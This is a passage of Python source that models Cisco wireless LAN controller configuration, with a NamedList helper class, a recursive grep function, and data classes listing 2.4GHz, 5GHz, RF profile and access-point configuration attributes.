NamedList): # For NAMED LISTS\n for item in value:\n grep(item, keyword)\n else:\n if keyword in attr:\n print(object_instance, attr, value)\n if hasattr(value, 'objname'):\n grep(value, keyword)\n if value is not None and hasattr(value, 'objname') == False:\n if keyword in value:\n print(object_instance, attr, value)\n\n\n#Customized classes descriptions section\nclass NamedList(list): # Special class to refer to its name in object tree\n def __init__(self, list_name, item_name):\n self.objname = list_name\n self.item_name = item_name\n\n def __getitem__(self, name):\n x = NamedList(self.objname, self.item_name) # Clone the same object type as called\n for item in self:\n if item.name == name:\n x.append(item)\n if len(x) == 1: # if only one item should be returned - no need to return the list\n copied_list = x.copy()\n return copied_list.pop() # Should do pop() only for list copy to make list unchanged\n elif len(x) == 0:\n if name is not None:\n print('WARNING! Zero elements with name ', name, ' was found ')\n return x\n else:\n print('WARNING! More than one element with name ', name,\n ' was found. Use filter() to find necessary item by matching other attributes')\n return x\n\n def filter(self, attrname, required_value):\n x = NamedList(self.objname, self.item_name) # Clone the same object type as called\n for item in self:\n try:\n real_value = getattr(item, attrname)\n if real_value == required_value:\n x.append(item)\n\n except KeyError as e:\n print('No attribute with name ', attrname)\n return None\n except:\n print('Other error ')\n return None\n if len(x) == 1: # if only one item should be returned - no need to return the list\n copied_list = x.copy()\n return copied_list.pop() # Should do pop() only for list copy to make list unchanged\n else:\n return x\n\n def __str__(self):\n x = ''\n item_objname = ''\n length = len(self)\n if length == 0:\n return 'Named List of length ' + str(length) + ' with items ' + self.item_name\n for index, item in enumerate(self):\n x = x + ' ' + item.name + ', '\n item_objname = item.objname\n x = 'Named List of length ' + str(length) + ' with items ' + self.item_name + ':' + x\n return x[:-2]\n\n def __repr__(self):\n x = ''\n item_objname = ''\n length = len(self)\n if length == 0:\n return 'Named List of length ' + str(length) + ' with items ' + self.item_name\n for index, item in enumerate(self):\n x = x + ' ' + item.name + ', '\n item_objname = item.objname\n x = 'Named List of length ' + str(length) + ' with items ' + self.item_name + ':' + x\n return x[:-2]\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Band24_Config():\n def __init__(self, name=None):\n self.objname = '2.4GHz config'\n self.name = '2.4GHz config'\n self.type = 'config' # defines if class contain operational or config data\n self.d_802_11b_network = None\n self.d_11gsupport = None\n self.d_11nsupport = None\n self.d_802_11b_g_operational_rates = None\n self.d_802_11b_g_operational_rates_802_11b_g_1m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_2m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_5_5m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_11m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_6m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_9m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_12m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_18m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_24m_rate = None\n 
self.d_802_11b_g_operational_rates_802_11g_36m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_48m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_54m_rate = None\n self.d_802_11n_mcs_settings = None\n self.d_802_11n_mcs_settings_mcs_0 = None\n self.d_802_11n_mcs_settings_mcs_1 = None\n self.d_802_11n_mcs_settings_mcs_2 = None\n self.d_802_11n_mcs_settings_mcs_3 = None\n self.d_802_11n_mcs_settings_mcs_4 = None\n self.d_802_11n_mcs_settings_mcs_5 = None\n self.d_802_11n_mcs_settings_mcs_6 = None\n self.d_802_11n_mcs_settings_mcs_7 = None\n self.d_802_11n_mcs_settings_mcs_8 = None\n self.d_802_11n_mcs_settings_mcs_9 = None\n self.d_802_11n_mcs_settings_mcs_10 = None\n self.d_802_11n_mcs_settings_mcs_11 = None\n self.d_802_11n_mcs_settings_mcs_12 = None\n self.d_802_11n_mcs_settings_mcs_13 = None\n self.d_802_11n_mcs_settings_mcs_14 = None\n self.d_802_11n_mcs_settings_mcs_15 = None\n self.d_802_11n_mcs_settings_mcs_16 = None\n self.d_802_11n_mcs_settings_mcs_17 = None\n self.d_802_11n_mcs_settings_mcs_18 = None\n self.d_802_11n_mcs_settings_mcs_19 = None\n self.d_802_11n_mcs_settings_mcs_20 = None\n self.d_802_11n_mcs_settings_mcs_21 = None\n self.d_802_11n_mcs_settings_mcs_22 = None\n self.d_802_11n_mcs_settings_mcs_23 = None\n self.d_802_11n_mcs_settings_mcs_24 = None\n self.d_802_11n_mcs_settings_mcs_25 = None\n self.d_802_11n_mcs_settings_mcs_26 = None\n self.d_802_11n_mcs_settings_mcs_27 = None\n self.d_802_11n_mcs_settings_mcs_28 = None\n self.d_802_11n_mcs_settings_mcs_29 = None\n self.d_802_11n_mcs_settings_mcs_30 = None\n self.d_802_11n_mcs_settings_mcs_31 = None\n self.d_802_11n_status = None\n self.d_802_11n_status_a_mpdu_tx = None\n self.d_802_11n_status_a_mpdu_tx_priority_0 = None\n self.d_802_11n_status_a_mpdu_tx_priority_1 = None\n self.d_802_11n_status_a_mpdu_tx_priority_2 = None\n self.d_802_11n_status_a_mpdu_tx_priority_3 = None\n self.d_802_11n_status_a_mpdu_tx_priority_4 = None\n self.d_802_11n_status_a_mpdu_tx_priority_5 = None\n self.d_802_11n_status_a_mpdu_tx_priority_6 = None\n self.d_802_11n_status_a_mpdu_tx_priority_7 = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler_realtime_timeout = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler_non_realtime_timeout = None\n self.d_802_11n_status_a_msdu_tx = None\n self.d_802_11n_status_a_msdu_tx_priority_0 = None\n self.d_802_11n_status_a_msdu_tx_priority_1 = None\n self.d_802_11n_status_a_msdu_tx_priority_2 = None\n self.d_802_11n_status_a_msdu_tx_priority_3 = None\n self.d_802_11n_status_a_msdu_tx_priority_4 = None\n self.d_802_11n_status_a_msdu_tx_priority_5 = None\n self.d_802_11n_status_a_msdu_tx_priority_6 = None\n self.d_802_11n_status_a_msdu_tx_priority_7 = None\n self.d_802_11n_status_a_msdu_max_subframes = None\n self.d_802_11n_status_a_msdu_max_length = None\n self.d_802_11n_status_rifs_rx = None\n self.d_802_11n_status_guard_interval = None\n self.beacon_interval = None\n self.cf_pollable_mode = None\n self.cf_poll_request_mandatory = None\n self.cfp_period = None\n self.cfp_maximum_duration = None\n self.default_channel = None\n self.default_tx_power_level = None\n self.dtpc_status = None\n self.rssi_low_check = None\n self.rssi_threshold = None\n self.call_admission_limit = None\n self.g711_cu_quantum = None\n self.ed_threshold = None\n self.fragmentation_threshold = None\n self.pbcc_mandatory = None\n self.rts_threshold = None\n self.short_preamble_mandatory = None\n self.short_retry_limit = None\n 
self.legacy_tx_beamforming_setting = None\n self.traffic_stream_metrics_status = None\n self.expedited_bw_request_status = None\n self.world_mode = None\n self.faster_carrier_tracking_loop = None\n self.edca_profile_type = None\n self.voice_mac_optimization_status = None\n self.call_admission_control_cac_configuration = None\n self.call_admission_control_cac_configuration_voice_ac_admission_control_acm = None\n self.call_admission_control_cac_configuration_voice_stream_size = None\n self.call_admission_control_cac_configuration_voice_max_streams = None\n self.call_admission_control_cac_configuration_voice_max_rf_bandwidth = None\n self.call_admission_control_cac_configuration_voice_reserved_roaming_bandwidth = None\n self.call_admission_control_cac_configuration_voice_cac_method = None\n self.call_admission_control_cac_configuration_voice_tspec_inactivity_timeout = None\n self.cac_sip_voice_configuration = None\n self.cac_sip_voice_configuration_sip_based_cac = None\n self.cac_sip_voice_configuration_sip_codec_type = None\n self.cac_sip_voice_configuration_sip_call_bandwidth = None\n self.cac_sip_voice_configuration_sip_call_bandwidth_sample_size = None\n self.cac_sip_voice_configuration_video_ac_admission_control_acm = None\n self.cac_sip_voice_configuration_video_max_rf_bandwidth = None\n self.cac_sip_voice_configuration_video_reserved_roaming_bandwidth = None\n self.cac_sip_voice_configuration_video_load_based_cac_mode = None\n self.cac_sip_voice_configuration_video_cac_method = None\n self.cac_sip_video_configuration = None\n self.cac_sip_video_configuration_sip_based_cac = None\n self.cac_sip_video_configuration_best_effort_ac_admission_control_acm = None\n self.cac_sip_video_configuration_background_ac_admission_control_acm = None\n self.maximum_number_of_clients_per_ap = None\n self.l2roam_802_11bg_rf_parameters = None\n self.l2roam_802_11bg_rf_parameters_config_mode = None\n self.l2roam_802_11bg_rf_parameters_minimum_rssi = None\n self.l2roam_802_11bg_rf_parameters_roam_hysteresis = None\n self.l2roam_802_11bg_rf_parameters_scan_threshold = None\n self.l2roam_802_11bg_rf_parameters_transition_time = None\n\n def __str__(self):\n return '802.11b network config'\n\n def __repr__(self):\n return '802.11b network config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Band5_Config():\n def __init__(self, name=None):\n self.objname = '5GHz config'\n self.name = '5GHz config'\n self.type = 'config' # defines if class contain operational or config data\n self.d_802_11a_network = None\n self.d_11acsupport = None\n self.d_11nsupport = None\n self.d_11nsupport_802_11a_low_band = None\n self.d_11nsupport_802_11a_mid_band = None\n self.d_11nsupport_802_11a_high_band = None\n self.d_802_11a_operational_rates = None\n self.d_802_11a_operational_rates_802_11a_6m_rate = None\n self.d_802_11a_operational_rates_802_11a_9m_rate = None\n self.d_802_11a_operational_rates_802_11a_12m_rate = None\n self.d_802_11a_operational_rates_802_11a_18m_rate = None\n self.d_802_11a_operational_rates_802_11a_24m_rate = None\n self.d_802_11a_operational_rates_802_11a_36m_rate = None\n self.d_802_11a_operational_rates_802_11a_48m_rate = None\n self.d_802_11a_operational_rates_802_11a_54m_rate = None\n self.d_802_11n_mcs_settings = None\n self.d_802_11n_mcs_settings_mcs_0 = None\n self.d_802_11n_mcs_settings_mcs_1 = None\n self.d_802_11n_mcs_settings_mcs_2 = None\n self.d_802_11n_mcs_settings_mcs_3 = None\n self.d_802_11n_mcs_settings_mcs_4 = None\n 
self.d_802_11n_mcs_settings_mcs_5 = None\n self.d_802_11n_mcs_settings_mcs_6 = None\n self.d_802_11n_mcs_settings_mcs_7 = None\n self.d_802_11n_mcs_settings_mcs_8 = None\n self.d_802_11n_mcs_settings_mcs_9 = None\n self.d_802_11n_mcs_settings_mcs_10 = None\n self.d_802_11n_mcs_settings_mcs_11 = None\n self.d_802_11n_mcs_settings_mcs_12 = None\n self.d_802_11n_mcs_settings_mcs_13 = None\n self.d_802_11n_mcs_settings_mcs_14 = None\n self.d_802_11n_mcs_settings_mcs_15 = None\n self.d_802_11n_mcs_settings_mcs_16 = None\n self.d_802_11n_mcs_settings_mcs_17 = None\n self.d_802_11n_mcs_settings_mcs_18 = None\n self.d_802_11n_mcs_settings_mcs_19 = None\n self.d_802_11n_mcs_settings_mcs_20 = None\n self.d_802_11n_mcs_settings_mcs_21 = None\n self.d_802_11n_mcs_settings_mcs_22 = None\n self.d_802_11n_mcs_settings_mcs_23 = None\n self.d_802_11n_mcs_settings_mcs_24 = None\n self.d_802_11n_mcs_settings_mcs_25 = None\n self.d_802_11n_mcs_settings_mcs_26 = None\n self.d_802_11n_mcs_settings_mcs_27 = None\n self.d_802_11n_mcs_settings_mcs_28 = None\n self.d_802_11n_mcs_settings_mcs_29 = None\n self.d_802_11n_mcs_settings_mcs_30 = None\n self.d_802_11n_mcs_settings_mcs_31 = None\n self.d_802_11ac_mcs_settings = None\n self.d_802_11ac_mcs_settings_nss_1_mcs_0_9 = None\n self.d_802_11ac_mcs_settings_nss_2_mcs_0_9 = None\n self.d_802_11ac_mcs_settings_nss_3_mcs_0_9 = None\n self.d_802_11ac_mcs_settings_nss_4_mcs_0_7 = None\n self.d_802_11ac_mcs_settings_nss_4_mcs_0_9 = None\n self.d_802_11n_status = None\n self.d_802_11n_status_a_mpdu_tx = None\n self.d_802_11n_status_a_mpdu_tx_priority_0 = None\n self.d_802_11n_status_a_mpdu_tx_priority_1 = None\n self.d_802_11n_status_a_mpdu_tx_priority_2 = None\n self.d_802_11n_status_a_mpdu_tx_priority_3 = None\n self.d_802_11n_status_a_mpdu_tx_priority_4 = None\n self.d_802_11n_status_a_mpdu_tx_priority_5 = None\n self.d_802_11n_status_a_mpdu_tx_priority_6 = None\n self.d_802_11n_status_a_mpdu_tx_priority_7 = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler = None\n self.d_802_11n_status_a_mpdu_tx_frame_burst = None\n self.d_802_11n_status_a_mpdu_tx_frame_burst_realtime_timeout = None\n self.d_802_11n_status_a_mpdu_tx_frame_burst_non_realtime_timeout = None\n self.d_802_11n_status_a_msdu_tx = None\n self.d_802_11n_status_a_msdu_tx_priority_0 = None\n self.d_802_11n_status_a_msdu_tx_priority_1 = None\n self.d_802_11n_status_a_msdu_tx_priority_2 = None\n self.d_802_11n_status_a_msdu_tx_priority_3 = None\n self.d_802_11n_status_a_msdu_tx_priority_4 = None\n self.d_802_11n_status_a_msdu_tx_priority_5 = None\n self.d_802_11n_status_a_msdu_tx_priority_6 = None\n self.d_802_11n_status_a_msdu_tx_priority_7 = None\n self.d_802_11n_status_a_msdu_max_subframes = None\n self.d_802_11n_status_a_msdu_max_length = None\n self.d_802_11n_status_rifs_rx = None\n self.d_802_11n_status_guard_interval = None\n self.beacon_interval = None\n self.cf_pollable_mandatory = None\n self.cf_poll_request_mandatory = None\n self.cfp_period = None\n self.cfp_maximum_duration = None\n self.default_channel = None\n self.default_tx_power_level = None\n self.dtpc_status = None\n self.fragmentation_threshold = None\n self.rssi_low_check = None\n self.rssi_threshold = None\n self.ti_threshold = None\n self.legacy_tx_beamforming_setting = None\n self.traffic_stream_metrics_status = None\n self.expedited_bw_request_status = None\n self.world_mode = None\n self.dfs_peakdetect = None\n self.edca_profile_type = None\n self.voice_mac_optimization_status = None\n 
self.call_admission_control_cac_configuration = None\n self.voice_ac = None\n self.voice_ac_voice_ac_admission_control_acm = None\n self.voice_ac_voice_stream_size = None\n self.voice_ac_voice_max_streams = None\n self.voice_ac_voice_max_rf_bandwidth = None\n self.voice_ac_voice_reserved_roaming_bandwidth = None\n self.voice_ac_voice_cac_method = None\n self.voice_ac_voice_tspec_inactivity_timeout = None\n self.cac_sip_voice_configuration = None\n self.cac_sip_voice_configuration_sip_based_cac = None\n self.cac_sip_voice_configuration_sip_codec_type = None\n self.cac_sip_voice_configuration_sip_call_bandwidth = None\n self.cac_sip_voice_configuration_sip_call_bandwith_sample_size = None\n self.video_ac = None\n self.video_ac_video_ac_admission_control_acm = None\n self.video_ac_video_max_rf_bandwidth = None\n self.video_ac_video_reserved_roaming_bandwidth = None\n self.video_ac_video_load_based_cac_mode = None\n self.video_ac_video_cac_method = None\n self.cac_sip_video_configuration = None\n self.cac_sip_video_configuration_sip_based_cac = None\n self.cac_sip_video_configuration_best_effort_ac_admission_control_acm = None\n self.cac_sip_video_configuration_background_ac_admission_control_acm = None\n self.maximum_number_of_clients_per_ap_radio = None\n self.l2roam_802_11a_rf_parameters = None\n self.l2roam_802_11a_rf_parameters_config_mode = None\n self.l2roam_802_11a_rf_parameters_minimum_rssi = None\n self.l2roam_802_11a_rf_parameters_roam_hysteresis = None\n self.l2roam_802_11a_rf_parameters_scan_threshold = None\n self.l2roam_802_11a_rf_parameters_transition_time = None\n self.d_802_11h_configuration = None\n self.power_constraint = None\n self.channel_switch = None\n self.channel_mode = None\n self.smart_dfs = None\n\n def __str__(self):\n return '802.11a network config'\n\n def __repr__(self):\n return '802.11a network config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Rf_Profile():\n def __init__(self, name=None):\n self.objname = 'RF profile'\n self.name = None\n self.type = 'config'\n self.rf_profile_name = None\n self.description = None\n self.ap_group_name = None\n self.radio_policy = None\n self.d_11n_client_only = None\n self.transmit_power_threshold_v1 = None\n self.transmit_power_threshold_v2 = None\n self.min_transmit_power = None\n self.max_transmit_power = None\n self.d_802_11b_g_operational_rates = None\n self.d_802_11b_g_operational_rates_802_11b_g_1m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_2m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_5_5m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_11m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_6m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_9m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_12m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_18m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_24m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_36m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_48m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_54m_rate = None\n self.d_802_11a_operational_rates = None\n self.d_802_11a_operational_rates_802_11a_6m_rate = None\n self.d_802_11a_operational_rates_802_11a_9m_rate = None\n self.d_802_11a_operational_rates_802_11a_12m_rate = None\n self.d_802_11a_operational_rates_802_11a_18m_rate = None\n self.d_802_11a_operational_rates_802_11a_24m_rate = None\n self.d_802_11a_operational_rates_802_11a_36m_rate = None\n 
self.d_802_11a_operational_rates_802_11a_48m_rate = None\n self.d_802_11a_operational_rates_802_11a_54m_rate = None\n self.trap_threshold = None\n self.trap_threshold_clients = None\n self.trap_threshold_interference = None\n self.trap_threshold_noise = None\n self.trap_threshold_utilization = None\n self.multicast_data_rate = None\n self.rx_sop_threshold = None\n self.cca_threshold = None\n self.slot_admin_state = None\n self.client_aware_fra = None\n self.client_aware_fra_state = None\n self.client_aware_fra_client_select_utilization_threshold = None\n self.client_aware_fra_client_reset_utilization_threshold = None\n self.band_select = None\n self.band_select_probe_response = None\n self.band_select_cycle_count = None\n self.band_select_cycle_threshold = None\n self.band_select_expire_suppression = None\n self.band_select_expire_dual_band = None\n self.band_select_client_rssi = None\n self.band_select_client_mid_rssi = None\n self.load_balancing = None\n self.load_balancing_denial = None\n self.load_balancing_window = None\n self.coverage_data = None\n self.coverage_data_data = None\n self.coverage_data_voice = None\n self.coverage_data_minimum_client_level = None\n self.coverage_data_exception_level = None\n self.dca_channel_list = None\n self.dca_bandwidth = None\n self.dca_foreign_ap_contribution = None\n self.d_802_11n_mcs_rates = None\n self.d_802_11n_mcs_rates_mcs_00_rate = None\n self.d_802_11n_mcs_rates_mcs_01_rate = None\n self.d_802_11n_mcs_rates_mcs_02_rate = None\n self.d_802_11n_mcs_rates_mcs_03_rate = None\n self.d_802_11n_mcs_rates_mcs_04_rate = None\n self.d_802_11n_mcs_rates_mcs_05_rate = None\n self.d_802_11n_mcs_rates_mcs_06_rate = None\n self.d_802_11n_mcs_rates_mcs_07_rate = None\n self.d_802_11n_mcs_rates_mcs_08_rate = None\n self.d_802_11n_mcs_rates_mcs_09_rate = None\n self.d_802_11n_mcs_rates_mcs_10_rate = None\n self.d_802_11n_mcs_rates_mcs_11_rate = None\n self.d_802_11n_mcs_rates_mcs_12_rate = None\n self.d_802_11n_mcs_rates_mcs_13_rate = None\n self.d_802_11n_mcs_rates_mcs_14_rate = None\n self.d_802_11n_mcs_rates_mcs_15_rate = None\n self.d_802_11n_mcs_rates_mcs_16_rate = None\n self.d_802_11n_mcs_rates_mcs_17_rate = None\n self.d_802_11n_mcs_rates_mcs_18_rate = None\n self.d_802_11n_mcs_rates_mcs_19_rate = None\n self.d_802_11n_mcs_rates_mcs_20_rate = None\n self.d_802_11n_mcs_rates_mcs_21_rate = None\n self.d_802_11n_mcs_rates_mcs_22_rate = None\n self.d_802_11n_mcs_rates_mcs_23_rate = None\n self.d_802_11n_mcs_rates_mcs_24_rate = None\n self.d_802_11n_mcs_rates_mcs_25_rate = None\n self.d_802_11n_mcs_rates_mcs_26_rate = None\n self.d_802_11n_mcs_rates_mcs_27_rate = None\n self.d_802_11n_mcs_rates_mcs_28_rate = None\n self.d_802_11n_mcs_rates_mcs_29_rate = None\n self.d_802_11n_mcs_rates_mcs_30_rate = None\n self.d_802_11n_mcs_rates_mcs_31_rate = None\n self.client_network_preference = None\n\n def update_name(self):\n self.name = self.rf_profile_name\n\n def __str__(self):\n return 'RF profile ' + self.name\n\n def __repr__(self):\n return 'RF profile ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Config():\n def __init__(self, name=None):\n self.objname = 'AP Config'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.cisco_ap_identifier = None\n self.cisco_ap_name = None\n self.country_code = None\n self.regulatory_domain_allowed_by_country = None\n self.ap_country_code = None\n self.wireless_logging_state = None\n 
self.ap_regulatory_domain = None\n self.switch_port_number = None\n self.mac_address = None\n self.ip_address_configuration = None\n self.ip_address = None\n self.ip_netmask = None\n self.gateway_ip_addr = None\n self.nat_external_ip_address = None\n self.capwap_path_mtu = None\n self.dhcp_release_override = None\n self.telnet_state = None\n self.ssh_state = None\n self.cisco_ap_location = None\n self.cisco_ap_floor_label = None\n self.cisco_ap_group_name = None\n self.primary_cisco_switch_name = None\n self.primary_cisco_switch_ip_address = None\n self.secondary_cisco_switch_name = None\n self.secondary_cisco_switch_ip_address = None\n self.tertiary_cisco_switch_name = None\n self.tertiary_cisco_switch_ip_address = None\n self.administrative_state = None\n self.operation_state = None\n self.mirroring_mode = None\n self.ap_mode = None\n self.public_safety = None\n self.atf_mode = None\n self.ap_submode = None\n self.rogue_detection = None\n self.remote_ap_debug = None\n self.logging_trap_severity_level = None\n self.logging_syslog_facility = None\n self.s_w_version = None\n self.boot_version = None\n self.mini_ios_version = None\n self.stats_reporting_period = None\n self.stats_collection_mode = None\n self.radio_core_mode = None\n self.slub_debug_mode = None\n self.led_state = None\n self.poe_pre_standard_switch = None\n self.poe_power_injector_mac_addr = None\n self.power_type_mode = None\n self.number_of_slots = None\n self.ap_model = None\n self.ap_image = None\n self.ios_version = None\n self.reset_button = None\n self.ap_serial_number = None\n self.ap_certificate_type = None\n self.ap_lag_status = None\n self.ap_user_mode = None\n self.ap_user_name = None\n self.ap_dot1x_user_mode = None\n self.ap_dot1x_user_name = None\n self.cisco_ap_system_logging_host = None\n self.ap_core_dump_config = None\n self.ap_up_time = None\n self.ap_lwapp_up_time = None\n self.join_date_and_time = None\n self.join_taken_time = None\n self.slot_0 = None\n self.slot_0_radio_type = None\n self.slot_0_administrative_state = None\n self.slot_0_operation_state = None\n self.slot_0_mesh_radio_role = None\n self.slot_0_radio_role = None\n self.slot_0_radio_subtype = None\n self.slot_0_radio_role_assignment_method = None\n self.slot_0_radio_role_band = None\n self.slot_0_phy_dsss_parameters_current_cca_mode = None\n self.slot_0_phy_dsss_parameters_ed_threshold = None\n self.slot_0_operation_rate_set_6000_kilo_bits = None\n self.slot_0_operation_rate_set_9000_kilo_bits = None\n self.slot_0_operation_rate_set_5500_kilo_bits = None\n self.slot_0_operation_rate_set_1000_kilo_bits = None\n self.slot_0_operation_rate_set_2000_kilo_bits = None\n self.slot_0_cellid = None\n self.slot_0_station_configuration = None\n self.slot_0_configuration = None\n self.slot_0_number_of_wlans = None\n self.slot_0_medium_occupancy_limit = None\n self.slot_0_cfp_period = None\n self.slot_0_cfp_maxduration = None\n self.slot_0_bssid = None\n self.slot_0_operation_rate_set = None\n self.slot_0_operation_rate_set_11000_kilo_bits = None\n self.slot_0_operation_rate_set_12000_kilo_bits = None\n self.slot_0_operation_rate_set_18000_kilo_bits = None\n self.slot_0_operation_rate_set_24000_kilo_bits = None\n self.slot_0_operation_rate_set_36000_kilo_bits = None\n self.slot_0_operation_rate_set_48000_kilo_bits = None\n self.slot_0_operation_rate_set_54000_kilo_bits = None\n self.slot_0_mcs_set = None\n self.slot_0_mcs_set_mcs_0 = None\n self.slot_0_mcs_set_mcs_1 = None\n self.slot_0_mcs_set_mcs_2 = None\n self.slot_0_mcs_set_mcs_3 = None\n 
self.slot_0_mcs_set_mcs_4 = None\n self.slot_0_mcs_set_mcs_5 = None\n self.slot_0_mcs_set_mcs_6 = None\n self.slot_0_mcs_set_mcs_7 = None\n self.slot_0_mcs_set_mcs_8 = None\n self.slot_0_mcs_set_mcs_9 = None\n self.slot_0_mcs_set_mcs_10 = None\n self.slot_0_mcs_set_mcs_11 = None\n self.slot_0_mcs_set_mcs_12 = None\n self.slot_0_mcs_set_mcs_13 = None\n self.slot_0_mcs_set_mcs_14 = None\n self.slot_0_mcs_set_mcs_15 = None\n self.slot_0_mcs_set_mcs_16 = None\n self.slot_0_mcs_set_mcs_17 = None\n self.slot_0_mcs_set_mcs_18 = None\n self.slot_0_mcs_set_mcs_19 = None\n self.slot_0_mcs_set_mcs_20 = None\n self.slot_0_mcs_set_mcs_21 = None\n self.slot_0_mcs_set_mcs_22 = None\n self.slot_0_mcs_set_mcs_23 = None\n self.slot_0_mcs_set_mcs_24 = None\n self.slot_0_mcs_set_mcs_25 = None\n self.slot_0_mcs_set_mcs_26 = None\n self.slot_0_mcs_set_mcs_27 = None\n self.slot_0_mcs_set_mcs_28 = None\n self.slot_0_mcs_set_mcs_29 = None\n self.slot_0_mcs_set_mcs_30 = None\n self.slot_0_mcs_set_mcs_31 = None\n self.slot_0_802_11ac_mcs_set = None\n self.slot_0_802_11ac_mcs_set_nss_1_mcs_0_9 = None\n self.slot_0_802_11ac_mcs_set_nss_2_mcs_0_9 = None\n self.slot_0_802_11ac_mcs_set_nss_3_mcs_0_9 = None\n self.slot_0_802_11ac_mcs_set_nss_4_mcs_0_7 = None\n self.slot_0_phy_dsss_parameters = None\n self.slot_0_containment_count_rogue_bssid = None\n self.slot_0_containment_count_rogue_bssid_containment_type = None\n self.slot_0_containment_count_rogue_bssid_channel_count = None\n self.slot_0_beacon_period = None\n self.slot_0_fragmentation_threshold = None\n self.slot_0_multi_domain_capability_implemented = None\n self.slot_0_multi_domain_capability_enabled = None\n self.slot_0_country_string = None\n self.slot_0_multi_domain_capability = None\n self.slot_0_multi_domain_capability_configuration = None\n self.slot_0_multi_domain_capability_first_chan_num = None\n self.slot_0_multi_domain_capability_number_of_channels = None\n self.slot_0_mac_operation_parameters = None\n self.slot_0_mac_operation_parameters_configuration = None\n self.slot_0_mac_operation_parameters_fragmentation_threshold = None\n self.slot_0_mac_operation_parameters_packet_retry_limit = None\n self.slot_0_tx_power = None\n self.slot_0_tx_power_num_of_supported_power_levels = None\n self.slot_0_tx_power_tx_power_level_1 = None\n self.slot_0_tx_power_tx_power_level_2 = None\n self.slot_0_tx_power_tx_power_level_3 = None\n self.slot_0_tx_power_tx_power_level_4 = None\n self.slot_0_tx_power_tx_power_level_5 = None\n self.slot_0_tx_power_tx_power_level_6 = None\n self.slot_0_tx_power_tx_power_level_7 = None\n self.slot_0_tx_power_tx_power_level_8 = None\n self.slot_0_tx_power_tx_power_configuration = None\n self.slot_0_tx_power_current_tx_power_level = None\n self.slot_0_tx_power_tx_power_assigned_by = None\n self.slot_0_phy_ofdm_parameters = None\n self.slot_0_phy_ofdm_parameters_configuration = None\n self.slot_0_phy_ofdm_parameters_current_channel = None\n self.slot_0_phy_ofdm_parameters_channel_assigned_by = None\n self.slot_0_phy_ofdm_parameters_extension_channel = None\n self.slot_0_phy_ofdm_parameters_channel_width = None\n self.slot_0_phy_ofdm_parameters_allowed_channel_list = None\n self.slot_0_phy_ofdm_parameters_allowed_channel_list_ = None\n self.slot_0_phy_ofdm_parameters_ti_threshold = None\n self.slot_0_phy_ofdm_parameters_dca_channel_list = None\n self.slot_0_phy_ofdm_parameters_legacy_tx_beamforming_configuration = None\n self.slot_0_phy_ofdm_parameters_legacy_tx_beamforming = None\n self.slot_0_phy_ofdm_parameters_antenna_type = None\n 
self.slot_0_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units = None\n self.slot_0_phy_ofdm_parameters_diversity = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_a = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_b = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_c = None\n self.slot_0_phy_ofdm_parameters_802_11n_antennas_d = None\n self.slot_0_performance_profile_parameters = None\n self.slot_0_performance_profile_parameters_configuration = None\n self.slot_0_performance_profile_parameters_interference_threshold = None\n self.slot_0_performance_profile_parameters_noise_threshold = None\n self.slot_0_performance_profile_parameters_rf_utilization_threshold = None\n self.slot_0_performance_profile_parameters_data_rate_threshold = None\n self.slot_0_performance_profile_parameters_client_threshold = None\n self.slot_0_performance_profile_parameters_coverage_snr_threshold = None\n self.slot_0_performance_profile_parameters_coverage_exception_level = None\n self.slot_0_performance_profile_parameters_client_minimum_exception_level = None\n self.slot_0_rogue_containment_information = None\n self.slot_0_containment_count = None\n self.slot_0_cleanair_management_information = None\n self.slot_0_cleanair_management_information_cleanair_capable = None\n self.slot_0_cleanair_management_information_cleanair_management_administration_st = None\n self.slot_0_cleanair_management_information_cleanair_management_operation_state = None\n self.slot_0_cleanair_management_information_rapid_update_mode = None\n self.slot_0_cleanair_management_information_spectrum_expert_connection = None\n self.slot_0_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key = None\n self.slot_0_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter = None\n self.slot_0_cleanair_management_information_cleanair_sensor_state = None\n self.slot_0_radio_extended_configurations = None\n self.slot_0_radio_extended_configurations_beacon_period = None\n self.slot_0_radio_extended_configurations_beacon_range = None\n self.slot_0_radio_extended_configurations_multicast_buffer = None\n self.slot_0_radio_extended_configurations_multicast_data_rate = None\n self.slot_0_radio_extended_configurations_rx_sop_threshold = None\n self.slot_0_radio_extended_configurations_cca_threshold = None\n self.slot_1 = None\n self.slot_1_radio_type = None\n self.slot_1_radio_subband = None\n self.slot_1_administrative_state = None\n self.slot_1_operation_state = None\n self.slot_1_mesh_radio_role = None\n 